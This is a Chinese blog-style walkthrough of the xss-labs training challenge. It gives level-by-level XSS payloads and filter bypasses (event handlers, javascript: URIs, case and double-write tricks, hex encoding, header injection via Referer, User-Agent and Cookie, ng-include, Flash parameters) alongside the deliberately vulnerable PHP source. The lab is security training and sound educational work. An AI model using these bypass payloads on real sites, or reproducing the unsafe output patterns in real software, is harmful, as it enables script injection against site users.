XSS-labs通關挑戰(xss challenge)
0x00 xss-labs
最近在看xss,今天也就來做一下xss-labs通過挑戰。找了好久的源碼,終於被我給找到了,因為在GitHub上大家也知道那個下載速度,所以,我也就直接轉接到自己的碼雲上去了,在這也貼出來,歡迎大家下載使用。
源碼鏈接請點擊:https://gitee.com/ruoli-s/xss-labs
安裝沒啥好說的,直接放進自己搭建好的www目錄下,就可以開始闖關了,xss-labs一共有level 20,做着看吧。
(其實覺得這些圖片才是我真正想做xss challenge的最大原因
)
0x01 Level 1 無過濾機制
看了半天,原來參數在URL里放着呢,
修改參數,頁面也隨之變動,右鍵查看源代碼,發現有跳轉到level 2 的JS,而我們傳入的參數是幾位的,下面就顯示payload的長度。
OK,直接走代碼:
<script>alert(/xss/)</script>
0x02 Leval 2 閉合標簽
我們直接輸入level 1 的 payload,發現直接輸出了,這里應該是做了實體轉義。
F12查看前端代碼:
第一處就是顯示在頁面上的代碼,第二處是我們輸入的代碼,這里應該是做了轉義,我們構造payload,使用">嘗試閉合input標簽:
"><script>alert(/xss/)</script>
0x03 Leval 3 單引號閉合+htmlspecialchar()函數
來到Leval 3,我們還是先使用上兩關測試的payload來驗證:
發現全部被實體轉義了,我們去看源代碼:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
咳咳,發現對雙引號“做了限制,但是卻放行了單引號',而且居然在value這里也加了htmlspecialchars函數,這種情況我們可以通過事件標簽觸發表單執行。這里開始構造payload:
'onmouseover='alert(/xss/)
可以看到,在提交之后,沒有立刻彈出,這里我們還需要將鼠標移動到文本框,讓事件觸發。
補充:
0x04 Leval 4 雙引號閉合+添加事件
我們還是一樣,使用前面測試過的,先一一過一遍,當然,結果必然是失敗的,那么接下來我們看全端代碼:
可以發現源代碼對>和<進行了過濾,我們看源代碼:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
確實使用str_replace()對尖括號進行了過濾,而且對單引號'做了防御,所以,我們直接模仿上一題,使用HTML事件,構造payload:
"onmouseover="alert(/xss/)
這里也是成功過關。
0x05 Leval 5 javascript偽協議
終於來到了第五關,我們使用前面的方式都測了一遍,失敗無疑,但是發現了一些其他東西:
貌似on被做了手腳,我們繼續在o后面輸入其他,發現只有on被替換了,這也就意味着事件是不能用了。
繼續嘗試發現<script>也被進行了替換<scr_ipt>,
到這里相信大家都想到了,我們試試大小寫混用:
咳咳,在線打臉哈,輸出全為小寫,看來人家也是做了大小寫過濾了。
繼續嘗試看看能否閉合,我們輸入',",<,>,\進行嘗試,發現只有'被實體轉義。那應該就是可以使用"來構造閉合:
好,該試的都試過了,接下來我們試試 javascript 的偽協議:
"><a href=javascript:alert(/xss/)>
最后,我們也是成功的過關了,當然,還是看一下源碼比較踏實:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
也確實如我們猜的一致,分別對on和<script>進行了替換,也做了大小寫過濾。好了,繼續下一關,歐里給。
0x06 Leval 6 大小寫繞過
順利來到第6關,我們正在徒步前行!!!
我們直接拿上一關的payload來測試,當然,也不用想,肯定是行不通的,直接來看前端代碼,哎呦我去,發現了個啥,這次連href也給過濾了,是個狠人。
我們也測試一下on,<script>等,發現被過濾的明明白白的,且單引號'也被實體轉義,但是我們也發現了其他的東西,貌似沒有多慮大小寫哈?
我們直接擼大小寫,使用雙引號">構造閉合:
<ScRipt>alert(/xss/)</scRIpT>
這里也是成功過關。繼續,沖沖沖!!!
0x07 Leval 7 雙寫繞過
來到第七關,嗯,這個圖不錯,很魔性有沒有?
廢話不多說,先來一波,有木有發現還是挺管用的?(●'◡'●)。
發現像script這種關鍵字被過濾了,難道是雙寫?我們直接使用雙引號"閉合構造payload:
"><scrscriptipt>alert(/xss/)</scrscriptipt>
輕松搞定😁,下一個。
0x08 Leval 8 編碼繞過
來到第八關,啥也不是。
測試payload,可以看見前面測試過的基本都過濾了,大小寫也都卡的死死的,但是我們發現前端代碼中直接構造好了<a>標簽,既然這樣,我們不妨試試編碼,看能否繞過:
這里,筆者自己經過測試,html實體編碼和hex編碼都可以繞過,我就只放hex編碼吧,看大多數博客上都是HTML實體編碼,不熟悉的可以自己再了解了解。
我們可以看到,代碼轉換機制是將script中的ri變成了r_i,所以我們只編碼r和i試試:
| 字母 | 十進制 | hex(十六進制) |
|---|---|---|
| r | r | r |
| i | i | i |
構造payload:
javascript:alert(/xss/)
干得漂亮,下一關。
0x09 Leval 9 檢測關鍵字
越看這些圖片越喜歡🤭,按照慣例,我們還是先搗鼓一番。
我去,什么情況,該試的基本都試了一遍,這代碼給的是個啥?我們輸入的payload呢??
不行,待老衲去查看源代碼:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href="您的鏈接不合法?有沒有!">友情鏈接</a></center>';
}
else
{
echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';
}
?>
牛逼了,牛逼上天了,除了以前做過的所有過濾,竟然還加了個strpos函數,誰都不服就服你,這函數的意思是咱們輸入的字符串里面必須要有http://字符,我,吐了呀,這誰能想的到:
想要更多了解strpos函數的請點這里
看到這里並沒有對編碼進行過濾,所以我們還是延用上題的payload:
javascript:alert('xsshttp://')
咳咳,這題,,,挺不人道的,下一個,啥也不是。
0x10 Leval 10 隱藏信息
歷經千辛萬苦,終於來到了整個挑戰的一半,嗚嗚嗚。
噗噗噗,又吐了呀,所有的都試了,為毛又跑到URL鏈接上去了?看代碼神馬都沒得呀,但是冒出了個表單是啥?還在頁面沒有顯示?
沒辦法,去看源碼吧,哎,心碎了💔
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
發現沒有?感情keyword參數只是一個迷惑而已呀,真正起作用的是t_sort參數,但是有一個問題,它的type類型是hidden,我們得在前端改為text類型,讓其顯現出來,且后台只對<>做了過濾,我們可以用事件來構造:
"onmouseover="alert(/xss/)
注意:一定要在前端修改2次type類型,才能完成彈窗。
0x11 Leval 11 Referer
來到了11關,因為10關以后的基本不可能那么簡單,所以我們也沒必要再進行猜測浪費時間,直接看前端代碼,進行檢測,實在不行的,只能去看源碼了。
可以看到,和第十關比較類似,都有隱藏的表單。只是多了一個t_ref參數,就是不知道是不是傳參的。 我們先來嘗試使用上一關的方法,從標簽入手。
構造代碼:
&t_link="type="text&t_history="type="text&t_sort="type="text&t_ref="type="text
查看網頁代碼:
可以看到t_sort還是接受參數的,我們直接來看源代碼吧!!
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
發現多了一個$str11=$_SERVER['HTTP_REFERER']字段,而我們知道,HTTP_REFERER是獲取http請求中的Referer字段的,也就是我們是從哪一個頁面來到現在這個頁面的。我們可以使用Hackbar進行修改Referer字段。
查看網頁代碼,發現傳入的referer值被t_ref獲取了。
接下來我們就可以嘗試構造代碼,從referer這里突破:
" onclick="alert(/xss/)" type="text
查看網頁代碼:
最后點擊文本框即可:
0x12 Leval 12 User-agent
貌似越來越難了,連圖都開始落淚了。桑心 /(ㄒoㄒ)/~~
我們還是直接看網頁代碼吧:
有木有發現這次傳入的值這么眼熟呢?(●'◡'●),沒有的話,我們來看下面這張圖:
哈哈,是不是一模一樣呢?那么思路就有了,我們直接從User-agent入手,構造代碼:
user-agent" onclick="alert(/xss/)" type="text
最后,我們來檢測網頁代碼:
Ok,這里我們也是直接過關。
0x13 Leval 13 Cookie
來到13關,因為也不知道人家到底是從哪里入手,所以我們直接去看網頁代碼:
可以看到,又多了一個參數t_cook,猜測可能是cookie,我們直接上代碼試試:
Cookie" onclick="alert(/xss/)" type="text
可以看到,我們在Hackbar中添加的cookies字段,並沒有成功傳進去。
那就只能去抓個包看看了,是時候打開我們塵封已久的Burp Suite了。通過抓包,我們可以看到,竟然多了一個參數user,原來cookie的值是通過user才傳進去的。無奈╮(╯▽╰)╭
既然知道了傳參的關鍵,那我們就好構造代碼了:
Cookie" onclick="alert(/xss/)" type="text
我們通過Repeater模塊看到參數已經傳進去,那么將包放掉,去看看我們的收獲。
OK,13關也順利過了。繼續
0x14 Leval 14 Exif
這是個嘛玩意??圖片呢?等等,好像跳轉了,可小編貌似也沒那么長壽等下去哈,一直刷不出來(關鍵是我開了梯子也不行啊,果斷放棄看答案)····
去網上查了一下,說是什么Exif xss,好吧,我只知道CTF中的雜項中負責隱寫的那一塊有在Exif中隱藏信息的(反正小編是沒碰到這么簡單的隱寫題🤣),再去百度吧
好吧,就當漲漲見識了😂
0x15 Leval ng-include
剛開始找了一圈,愣是沒找到什么,最后發現,URL里面的參數在網頁源碼里有顯示,覺得可能有什么幺蛾子。
又看了看網頁源代碼,發現確實有個ng-include,也不知道是個啥。。。
最后去百度瞅了瞅,說什么ng-include是angular js中的東西,自己也不太懂,不過,貌似就跟php中的include函數類似,是將一個文件給包含進來。
說到這,我們來看看ng-include的用法:
1、ng-include 指令用於包含外部的 HTML文件。
2、包含的內容將作為指定元素的子節點。
3、ng-include 屬性的值可以是一個表達式,返回一個文件名。
4、默認情況下,包含的文件需要包含在同一個域名下。
值得注意的是:
ng-include,如果單純指定地址,必須要加引號
ng-include,加載外部html,script標簽中的內容不執行
ng-include,加載外部html中含有style標簽樣式可以識別
再去看看源代碼:
<html ng-app>
<head>
<meta charset="utf-8">
<script src="angular.min.js"></script>
<script>
window.alert = function()
{
confirm("完成的不錯!");
window.location.href="level16.php?keyword=test";
}
</script>
<title>歡迎來到level15</title>
</head>
<h1 align=center>歡迎來到第15關,自己想個辦法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
可以看到這里是通過src傳參,而且還對<>做了過濾,既然這里可以包含html文件,那也就是說也可以包含之前咱們做過的有xss漏洞的文件,所以就可以構造:
'level1.php?name=<a href="javascript:alert(/xss/)">'
OK,成功彈窗,下一個,這兩關做的人難受。
0x16Leval 16 空格實體轉義
經過測試,發現在url里面傳入參數,我們直接上最簡單的試試:
發現script字樣直接被過濾,甚至連/script也被濾掉了,那么試試上關的payload:
<img src="" onerror=alert('xss')>
呃呃,貌似空格被實體了:
好吧,現在也只能使用其他來代替空格了,第一個想到的是回車,即如下:因為在html里,回車是可以代替空格的。
<img
src=””
onerror=alert(‘xss’)
>
最后使用URL編碼將回車符轉換為%0a替代即可:
<img%0Asrc=""%0Aonerror=alert('xss')>
歐克歐克,成功彈窗。
順便看下源代碼:果然,全部被使用 實體替代了。
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php
0x17 Leval 17 參數拼接
emmm,又沒圖了,哎,隨便傳了幾個參數,發現,是根據arg01和arg02兩個參數進行接受的,傳參之后,對兩個參數進行了拼接,那么我門是不是可以直接使用事件來觸發呢?
呃,貌似沒啥反應啊,但是我們可以看到,明明有事件可以觸發,奇了怪了。
去問了度娘,人家說這里加載了swf圖片,但是真不幸的是,我們的firefox直接出不來,嗚嗚,換了Google,擦,flash被屏蔽了,但彈窗還是能出來:
又換了星願,終於出來了,嗚嗚😭
順便看看源代碼,看來和我們想的差不多,通過兩個arg傳參,且過濾了<>。
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
0x18 Leval 18 參數拼接
呃,剛開始以為又沒圖了呢,看到網頁代碼后,又有個swf,好吧,果斷換瀏覽器。
噗,這什么,,忽悠也不至於這樣的吧,
直接使用上一關的payload:
onmouse&arg02=alert(/xss/)
噗噗,這也行,直接就彈了?沒看懂,過吧!!
0x19 Leval 19 Flash xss
先試試上關的payload:好吧,看來是要使用"閉合,但是閉合之后,又因為又有htmlspecialchars()函數在這過濾,所以也沒辦法閉合。
沒辦法了,去看了答案,說是什么flash的反編譯,好的吧,反正我是不懂,有興趣的可以看看,自己目前是啃不下來。等啥時候時機成熟了,再單獨寫吧,放個答案先。
version&arg02=<a href='javascript:alert(/xss/)'>xss</a>
想深入研究的:點這里
0x20 Leval 20 Flash xss
好的吧,應該是換了個白色的flash,還是先貼個 答案:詳細的等自己能靜下心來再補。
arg01=id&arg02=\"))}catch(e){}if(!self.a)self.a=!alert(1)//%26width%26height
